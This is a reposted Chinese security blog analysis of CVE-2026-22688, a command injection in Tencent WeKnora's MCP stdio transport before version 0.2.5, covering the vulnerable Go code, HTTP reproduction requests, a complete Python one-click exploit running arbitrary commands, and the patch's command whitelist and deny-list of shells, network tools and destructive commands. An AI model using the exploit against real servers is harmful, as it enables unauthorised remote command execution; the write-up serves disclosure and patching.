文章总结: 本文分析了腾讯WeKnora框架CVE-2026-22688命令注入漏洞。在0.2.5版本前,系统未对MCP服务stdio传输的command和args参数做校验,直接调用exec.Command,导致攻击者可获取服务器Shell权限。文章详述了漏洞代码逻辑与复现流程。官方已在0.2.5版本通过命令白名单和参数黑名单机制修复该问题,建议用户尽快升级以防范RCE风险。 综合评分: 91 文章分类: 漏洞分析,代码审计,漏洞POC
CVE-2026-22688 – 腾讯WeKnora MCP Stdio 命令注入漏洞
dmd5安全 dmd5安全
dmd5安全
2026年1月15日 16:38 江西
一、漏洞描述
WeKnora 是一个基于大型语言模型(LLM)的框架,专为深度文档理解和语义检索而设计,尤其适用于处理复杂、异构文档。
#
它采用模块化架构,结合了多模态预处理、语义向量索引、智能检索和大型语言模型推理。WeKnora 的核心遵循 RAG(检索增强生成) 范式,通过将相关文档块与模型推理相结合,实现高质量、上下文感知性的答案。
#
WeKnora 在 0.2.5 版本之前,当用户创建或更新 MCP 服务时,如果传输类型选择 stdio,系统直接将用户提交的 command 和 args 参数传递给 exec.Command() 执行,未进行任何安全验证。
攻击者可以通过指定任意命令(如 bash、sh)及其参数,在服务器端执行恶意系统命令。由于服务通常以容器化方式部署,攻击者可获得容器内的 shell 访问权限,进一步可能逃逸到宿主机。 二、环境搭建 * 软件版本: WeKnora 0.2.3 (漏洞版本) * 部署方式: Docker Compose * 测试环境: macOS / Linux * Go 版本: 1.24 部署步骤 # 1. 下载漏洞版本源码cd /Users/liaojialin.6/Downloads/WeKnora-0.2.3 # 2.******* 这里我需要使用代理,不然我这里一直会报错,使用代理就好了docker compose build --build-arg GOPROXY_ARG=https://goproxy.cn,direct --build-arg APK_MIRROR_ARG= app # 3. 然后启动所有的服务docker compose up -d postgres redis docreader app 验证 
三、漏洞分析/代码分析
漏洞触发链路
先看链路,先懂整体流程后,然后再去分析代码,就会方便很多了
用户请求 (POST /api/v1/mcp-services) ↓CreateMCPService Handler (mcp_service.go:28) ↓验证 TenantID,绑定 JSON 到 MCPService 结构体 ↓调用 mcpServiceService.CreateMCPService() 存入数据库 ↓用户请求测试连接 (POST /api/v1/mcp-services/{id}/test) ↓TestMCPService Handler (mcp_service.go:258) ↓调用 mcpServiceService.TestMCPService() ↓调用 mcp.NewMCPClient() 创建客户端 ↓【漏洞点】client.NewStdioMCPClientWithOptions() 直接执行用户命令
代码分析
直接定位到和 MCP 相关的代码部分,一个是客户端代码,一个服务端代码
客户端代码
其实核心就是参数传递的过程中,解析问题,如果没有对我们传入的参数做任何过滤,在客户端调用的过程中直接执行
NewMCPClient 函数:
// NewMCPClient creates a new MCP client based on the transport typefunc NewMCPClient(config *ClientConfig) (MCPClient, error) { // ... 省略 HTTP client 和 headers 构建代码 ...
// Create client based on transport type var mcpClient *client.Client var err error switch config.Service.TransportType { case types.MCPTransportSSE: // SSE 传输类型处理... mcpClient, err = client.NewSSEMCPClient(*config.Service.URL, client.WithHTTPClient(httpClient), client.WithHeaders(headers), ) if err != nil { return nil, fmt.Errorf("failed to create SSE client: %w", err) } case types.MCPTransportHTTPStreamable: // HTTP Streamable 传输类型处理... mcpClient, err = client.NewStreamableHttpClient(*config.Service.URL, transport.WithHTTPBasicClient(httpClient), transport.WithHTTPHeaders(headers), ) if err != nil { return nil, fmt.Errorf("failed to create HTTP streamable client: %w", err) } case types.MCPTransportStdio: if config.Service.StdioConfig == nil { return nil, fmt.Errorf("stdio_config is required for stdio transport") }
// Convert env vars map to []string format (KEY=value) envVars := make([]string, 0, len(config.Service.EnvVars)) for key, value := range config.Service.EnvVars { envVars = append(envVars, fmt.Sprintf("%s=%s", key, value)) }
// Create stdio client with options // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption) // 🔴 漏洞点:直接使用用户输入的 command 和 args,无任何验证! mcpClient, err = client.NewStdioMCPClientWithOptions( config.Service.StdioConfig.Command, // ← 完全由用户控制 envVars, config.Service.StdioConfig.Args, // ← 完全由用户控制 ) if err != nil { return nil, fmt.Errorf("failed to create stdio client: %w", err) } default: return nil, ErrUnsupportedTransport }
return &mcpGoClient{ service: config.Service, client: mcpClient, }, nil}
创建 MCP 服务的 API 入口
文件位置: internal/handler/mcp_service.go
完整的 CreateMCPService 函数:
核心问题都在注释中标注出来了,创建 MCP 服务端,服务端解析的时候,也没有任何验证
// POST /api/mcp-servicesfunc (h *MCPServiceHandler) CreateMCPService(c *gin.Context) { ctx := c.Request.Context()
var service types.MCPService // 🔴 直接将 JSON 请求体绑定到结构体,无任何验证 if err := c.ShouldBindJSON(&service); err != nil { logger.Error(ctx, "Failed to parse MCP service request", err) c.Error(errors.NewBadRequestError(err.Error())) return }
tenantID := c.GetUint64(types.TenantIDContextKey.String()) if tenantID == 0 { logger.Error(ctx, "Tenant ID is empty") c.Error(errors.NewBadRequestError("Tenant ID cannot be empty")) return } service.TenantID = tenantID
// 🔴 直接调用服务层创建,未对 stdio_config.command/args 进行安全检查 if err := h.mcpServiceService.CreateMCPService(ctx, &service); err != nil { logger.ErrorWithFields(ctx, err, map[string]interface{}{"service_name": secutils.SanitizeForLog(service.Name)}) c.Error(errors.NewInternalServerError("Failed to create MCP service: " + err.Error())) return }
c.JSON(http.StatusOK, gin.H{ "success": true, "data": service, })}
服务层测试逻辑
文件位置: internal/application/service/mcp_service.go
TestMCPService 函数:
// TestMCPService tests the connection to an MCP service and returns available tools/resourcesfunc (s *mcpServiceService) TestMCPService( ctx context.Context, tenantID uint64, id string,) (*types.MCPTestResult, error) { // Get service service, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id) if err != nil { return nil, fmt.Errorf("failed to get MCP service: %w", err) } if service == nil { return nil, fmt.Errorf("MCP service not found") }
// Create temporary client for testing config := &mcp.ClientConfig{ Service: service, // 我们自己输入的恶意 command/args }
// 🔴 调用 mcp.NewMCPClient(),这里会执行用户命令 client, err := mcp.NewMCPClient(config) if err != nil { return &types.MCPTestResult{ Success: false, Message: fmt.Sprintf("Failed to create client: %v", err), }, nil }
// Connect testCtx, cancel := context.WithTimeout(ctx, 30*time.Second) defer cancel()
// 🔴 client.Connect() 内部调用 Start(),真正执行命令的地方 if err := client.Connect(testCtx); err != nil { return &types.MCPTestResult{ Success: false, Message: fmt.Sprintf("Connection failed: %v", err), }, nil } defer client.Disconnect()}
命令执行的核心代码
文件位置: internal/mcp/client.go
NewMCPClient 函数中的 stdio 处理部分:
case types.MCPTransportStdio: if config.Service.StdioConfig == nil { return nil, fmt.Errorf("stdio_config is required for stdio transport") }
// Convert env vars map to []string format (KEY=value) envVars := make([]string, 0, len(config.Service.EnvVars)) for key, value := range config.Service.EnvVars { envVars = append(envVars, fmt.Sprintf("%s=%s", key, value)) }
// Create stdio client with options // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption) // 🔴 漏洞点:直接使用用户输入的 command 和 args,无任何验证! mcpClient, err = client.NewStdioMCPClientWithOptions( config.Service.StdioConfig.Command, // ← 完全由用户控制 envVars, config.Service.StdioConfig.Args, // ← 完全由用户控制 ) if err != nil { return nil, fmt.Errorf("failed to create stdio client: %w", err) }
Connect 函数:
// Connect establishes connection to the MCP servicefunc (c *mcpGoClient) Connect(ctx context.Context) error { if c.connected { return ErrAlreadyConnected }
// 🔴 Start the client - 这里真正执行用户命令! if err := c.client.Start(ctx); err != nil { return fmt.Errorf("failed to start client: %w", err) }
c.connected = true if c.service.TransportType == types.MCPTransportStdio { logger.GetLogger(ctx).Infof("MCP stdio client connected: %s %v", c.service.StdioConfig.Command, c.service.StdioConfig.Args) } else { logger.GetLogger(ctx).Infof("MCP client connected to %s", *c.service.URL) } return nil}
四、漏洞复现
步骤 1: 注册用户账号
POST /api/v1/auth/register HTTP/1.1Host: localhost:8080Content-Type: application/json
{ "username": "attacker", "email": "[email protected]", "password": "Attacker123"}
然后我们去登录
步骤 2: 登录获取 Token
POST /api/v1/auth/login HTTP/1.1Host: localhost:8080Content-Type: application/json
{ "email": "[email protected]", "password": "Attacker123"}
有了用户我们就可以创建 MCP 服务器了
步骤 3: 创建恶意 MCP 服务
POST /api/v1/mcp-services HTTP/1.1Host: localhost:8080Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImF0dGFja2VyQHRlc3QuY29tIiwiZXhwIjoxNzY4MTIzMjM3LCJpYXQiOjE3NjgwMzY4MzcsInRlbmFudF9pZCI6MTAwMDMsInR5cGUiOiJhY2Nlc3MiLCJ1c2VyX2lkIjoiMTJlNjg3YzMtNTkzNS00MTY1LTk4NjItODhhOTY4ZDM3YzhlIn0.5IgEJQAxgf5xketuZBs1F-r7PkFUfWZiTJeMJSTpmXMContent-Type: application/jsonContent-Length: 252
{ "name": "rce", "description": "rce", "enabled": true, "transport_type": "stdio", "stdio_config": { "command": "bash", "args": ["-lc", "id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"] }, "env_vars": {} }
步骤 4: 触发命令执行
POST /api/v1/mcp-services/f41aa229-b1c7-4f8e-ab25-204751f6693f/test HTTP/1.1Host: localhost:8080Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImF0dGFja2VyQHRlc3QuY29tIiwiZXhwIjoxNzY4MTIzMjM3LCJpYXQiOjE3NjgwMzY4MzcsInRlbmFudF9pZCI6MTAwMDMsInR5cGUiOiJhY2Nlc3MiLCJ1c2VyX2lkIjoiMTJlNjg3YzMtNTkzNS00MTY1LTk4NjItODhhOTY4ZDM3YzhlIn0.5IgEJQAxgf5xketuZBs1F-r7PkFUfWZiTJeMJSTpmXMContent-Type: application/jsonContent-Length: 252
这部响应会超时,是正常的
步骤 5: 验证命令执行结果
一键利用脚本
文件: exploit_weknora_rce.py
#!/usr/bin/env python3"""CVE-2026-22688 - WeKnora MCP Stdio Command Injection Exploit
漏洞影响: WeKnora < 0.2.5利用条件: 需要已认证用户账号"""
import requestsimport sysimport json
class WeKnoraExploit: def __init__(self, target_url): self.target_url = target_url.rstrip('/') self.session = requests.Session() self.token = None
def register(self, username, email, password): """注册用户""" url = f"{self.target_url}/api/v1/auth/register" data = { "username": username, "email": email, "password": password } resp = self.session.post(url, json=data) if resp.status_code == 201: print(f"[+] 注册成功: {email}") return True print(f"[-] 注册失败: {resp.text}") return False
def login(self, email, password): """登录获取 Token""" url = f"{self.target_url}/api/v1/auth/login" data = {"email": email, "password": password} resp = self.session.post(url, json=data) if resp.status_code == 200: result = resp.json() self.token = result.get('token') print(f"[+] 登录成功,获取 Token") return True print(f"[-] 登录失败: {resp.text}") return False
def create_mcp_service(self, command, args): """创建恶意 MCP 服务""" url = f"{self.target_url}/api/v1/mcp-services" headers = {"Authorization": f"Bearer {self.token}"} data = { "name": "exploit", "description": "exploit", "enabled": True, "transport_type": "stdio", "stdio_config": { "command": command, "args": args }, "env_vars": {} } resp = self.session.post(url, json=data, headers=headers) if resp.status_code == 200: result = resp.json() service_id = result['data']['id'] print(f"[+] 恶意 MCP 服务创建成功,ID: {service_id}") return service_id print(f"[-] 创建 MCP 服务失败: {resp.text}") return None
def trigger_execution(self, service_id): """触发命令执行""" url = f"{self.target_url}/api/v1/mcp-services/{service_id}/test" headers = {"Authorization": f"Bearer {self.token}"} resp = self.session.post(url, headers=headers) print(f"[+] 触发命令执行: {resp.text}") return resp.status_code == 200
def execute_command(self, command, args): """执行任意命令""" if not self.token: print("[-] 请先登录") return False
service_id = self.create_mcp_service(command, args) if service_id: return self.trigger_execution(service_id) return False
def main(): if len(sys.argv) < 2: print(f"用法: {sys.argv[0]} <target_url> [command] [args...]") print(f"示例: {sys.argv[0]} http://localhost:8080 'bash' '-c' 'id > /tmp/pwned.txt'") sys.exit(1)
target_url = sys.argv[1] exploit = WeKnoraExploit(target_url)
# 注册或登录 email = "[email protected]" password = "Attacker123" exploit.register("attacker", email, password) exploit.login(email, password)
# 执行命令 if len(sys.argv) >= 4: command = sys.argv[2] args = sys.argv[3:] else: # 默认命令 command = "bash" args = ["-lc", "id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]
print(f"[*] 执行命令: {command} {' '.join(args)}") exploit.execute_command(command, args) print("[+] 利用完成,请验证命令执行结果")
if __name__ == "__main__": main()
五、漏洞修复
修复版本: WeKnora >= 0.2.5
官方在 commit f7900a5e9a18c99d25cec9589ead9e4e59ce04bb 中添加了完整的输入验证机制。
internal/utils/security.go
// AllowedStdioCommands defines the whitelist of allowed commands for MCP stdio transport// These are the standard MCP server launchers that are considered safevar AllowedStdioCommands = map[string]bool{ "uvx": true, // Python package runner (uv) "npx": true, // Node.js package runner}
// DangerousArgPatterns contains patterns that indicate potentially dangerous argumentsvar DangerousArgPatterns = []*regexp.Regexp{ regexp.MustCompile(`(?i)^-c$`), // Shell command execution flag regexp.MustCompile(`(?i)^--command$`), // Shell command execution flag regexp.MustCompile(`(?i)^-e$`), // Eval flag regexp.MustCompile(`(?i)^--eval$`), // Eval flag regexp.MustCompile(`(?i)[;&|]`), // Shell command chaining regexp.MustCompile(`(?i)\$\(`), // Command substitution regexp.MustCompile("(?i)`"), // Backtick command substitution regexp.MustCompile(`(?i)>\s*[/~]`), // Output redirection to absolute/home path regexp.MustCompile(`(?i)<\s*[/~]`), // Input redirection from absolute/home path regexp.MustCompile(`(?i)^/bin/`), // Direct binary path regexp.MustCompile(`(?i)^/usr/bin/`), // Direct binary path regexp.MustCompile(`(?i)^/sbin/`), // Direct binary path regexp.MustCompile(`(?i)^/usr/sbin/`), // Direct binary path regexp.MustCompile(`(?i)^\.\./`), // Path traversal regexp.MustCompile(`(?i)/\.\./`), // Path traversal in middle regexp.MustCompile(`(?i)^(bash|sh|zsh|ksh|csh|tcsh|fish|dash)$`), // Shell interpreters as args regexp.MustCompile(`(?i)^(curl|wget|nc|netcat|ncat)$`), // Network tools as args regexp.MustCompile(`(?i)^(rm|dd|mkfs|fdisk)$`), // Destructive commands as args}
// DangerousEnvVarPatterns contains patterns for dangerous environment variable names or valuesvar DangerousEnvVarPatterns = []*regexp.Regexp{ regexp.MustCompile(`(?i)^LD_PRELOAD$`), // Library injection regexp.MustCompile(`(?i)^LD_LIBRARY_PATH$`), // Library path manipulation regexp.MustCompile(`(?i)^DYLD_`), // macOS dynamic linker regexp.MustCompile(`(?i)^PATH$`), // PATH manipulation regexp.MustCompile(`(?i)^PYTHONPATH$`), // Python path manipulation regexp.MustCompile(`(?i)^NODE_OPTIONS$`), // Node.js options injection regexp.MustCompile(`(?i)^BASH_ENV$`), // Bash environment file regexp.MustCompile(`(?i)^ENV$`), // Shell environment file regexp.MustCompile(`(?i)^SHELL$`), // Shell override}
// ValidateStdioCommand validates the command for MCP stdio transport// Returns an error if the command is not in the whitelist or contains dangerous patternsfunc ValidateStdioCommand(command string) error { if command == "" { return fmt.Errorf("command cannot be empty") }
// Normalize command (extract base name if it's a path) baseCommand := command if strings.Contains(command, "/") { parts := strings.Split(command, "/") baseCommand = parts[len(parts)-1] }
// Check against whitelist if !AllowedStdioCommands[baseCommand] { return fmt.Errorf("command '%s' is not in the allowed list. Allowed commands: uvx, npx, node, python, python3, deno, bun", baseCommand) }
// Additional check: command should not contain path traversal if strings.Contains(command, "..") { return fmt.Errorf("command path contains invalid characters") }
return nil}
// ValidateStdioArgs validates the arguments for MCP stdio transport// Returns an error if any argument contains dangerous patternsfunc ValidateStdioArgs(args []string) error { if len(args) == 0 { return nil }
for i, arg := range args { // Check length if len(arg) > 1024 { return fmt.Errorf("argument %d exceeds maximum length (1024 characters)", i) }
// Check against dangerous patterns for _, pattern := range DangerousArgPatterns { if pattern.MatchString(arg) { return fmt.Errorf("argument %d contains potentially dangerous pattern: %s", i, SanitizeForLog(arg)) } }
// Check for null bytes if strings.Contains(arg, "\x00") { return fmt.Errorf("argument %d contains null bytes", i) } }
return nil}
// ValidateStdioEnvVars validates environment variables for MCP stdio transport// Returns an error if any env var name or value is dangerousfunc ValidateStdioEnvVars(envVars map[string]string) error { if len(envVars) == 0 { return nil }
for key, value := range envVars { // Check key against dangerous patterns for _, pattern := range DangerousEnvVarPatterns { if pattern.MatchString(key) { return fmt.Errorf("environment variable '%s' is not allowed for security reasons", key) } }
// Check key length if len(key) > 256 { return fmt.Errorf("environment variable name '%s' exceeds maximum length", SanitizeForLog(key[:50])) }
// Check value length if len(value) > 4096 { return fmt.Errorf("environment variable '%s' value exceeds maximum length", key) }
// Check for null bytes in value if strings.Contains(value, "\x00") { return fmt.Errorf("environment variable '%s' value contains null bytes", key) }
// Check value for shell injection patterns for _, pattern := range DangerousArgPatterns { if pattern.MatchString(value) { return fmt.Errorf("environment variable '%s' value contains potentially dangerous pattern", key) } } }
return nil}
// ValidateStdioConfig performs comprehensive validation of stdio configuration// This should be called before creating or executing any stdio-based MCP clientfunc ValidateStdioConfig(command string, args []string, envVars map[string]string) error { // Validate command if err := ValidateStdioCommand(command); err != nil { return fmt.Errorf("invalid command: %w", err) }
// Validate arguments if err := ValidateStdioArgs(args); err != nil { return fmt.Errorf("invalid arguments: %w", err) }
// Validate environment variables if err := ValidateStdioEnvVars(envVars); err != nil { return fmt.Errorf("invalid environment variables: %w", err) }
return nil
原文链接:https://xz.aliyun.com/news/91166
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:dmd5安全 dmd5安全 dmd5安全《CVE-2026-22688 – 腾讯WeKnora MCP Stdio 命令注入漏洞》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。





![[跟着静师傅学代码审计-全网首发]用友U9V6.6企业版多组织企业互联网应用平台命令执行+SQL+反序列化](/images/random/titlepic/3.jpg)


评论